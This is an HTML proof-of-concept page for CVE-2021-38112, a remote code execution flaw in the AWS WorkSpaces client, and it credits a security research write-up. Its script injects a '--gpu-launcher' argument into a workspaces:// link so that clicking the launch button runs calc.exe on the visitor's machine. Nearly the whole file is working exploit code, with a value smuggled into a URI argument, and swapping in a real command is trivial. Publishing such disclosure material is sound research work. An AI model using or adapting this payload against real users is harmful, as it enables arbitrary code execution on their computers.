<!--
	This is an example POC for CVE-2021-38112: AWS WorkSpaces Remote Code Execution
	More info: https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/
-->
<!DOCTYPE html>
<html>
<script>
	function launch(){
		reg_code = document.getElementById("reg_code").value;
		document.location = "workspaces://anything%20--gpu-launcher=%22calc.exe%22@"+reg_code;
	}
</script>
<body>
	<p>
		WorkSpaces Registration Code: <input id="reg_code">
	</p>
	<p>
	<button type="button" onclick="launch()">Launch WorkSpaces</button>
	</p>
</body>
</html>
